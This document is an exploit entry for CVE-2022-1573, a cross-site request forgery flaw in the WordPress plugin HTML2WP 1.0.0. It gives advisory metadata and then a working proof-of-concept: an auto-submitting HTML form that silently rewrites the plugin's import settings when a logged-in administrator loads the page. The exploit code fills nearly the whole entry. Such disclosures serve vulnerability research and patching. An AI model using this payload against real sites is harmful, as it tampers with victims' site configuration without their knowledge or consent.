CVE: CVE-2022-1573

Name: HTML2WP (html2wp)

Version: 1.0.0

Date: 2022-04-05 20:18:18

Advisory: https://wpscan.com/vulnerability/9c1acd9c-999f-4a35-a272-1ad31552e685

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin.php?page=html2wp-settings" method="post">
    <input type="text" name="import_settings[type]" value="page">
    <input type="text" name="import_settings[parent]" value="0">
    <input type="text" name="import_settings[template]" value="default">
    <input type="text" name="import_settings[status]" value="publish">
    <input type="text" name="import_settings[author]" value="1">
    <input type="text" name="import_settings[content_by]" value="all_file">
    <input type="text" name="import_settings[content_by_tag]" value="">
    <input type="text" name="import_settings[content_by_att]" value="">
    <input type="text" name="import_settings[content_by_val]" value="">
    <input type="text" name="import_settings[title_by]" value="file_name">
    <input type="text" name="import_settings[title_by_tag]" value="">
    <input type="text" name="import_settings[title_by_att]" value="">
    <input type="text" name="import_settings[title_by_val]" value="">
    <input type="text" name="import_settings[replace_a_href_from]" value="">
    <input type="text" name="import_settings[replace_a_href_to]" value="">
    <input type="text" name="import_settings[replace_css_href_from]" value="">
    <input type="text" name="import_settings[replace_css_href_to]" value="">
    <input type="text" name="import_settings[replace_img_src_from]" value="aaa">
    <input type="text" name="import_settings[replace_img_src_to]" value="bbb">
    <input type="text" name="import_settings[replace_script_src_from]" value="">
    <input type="text" name="import_settings[replace_script_src_to]" value="">
</form>
<script>
    document.forms[0].submit();
</script>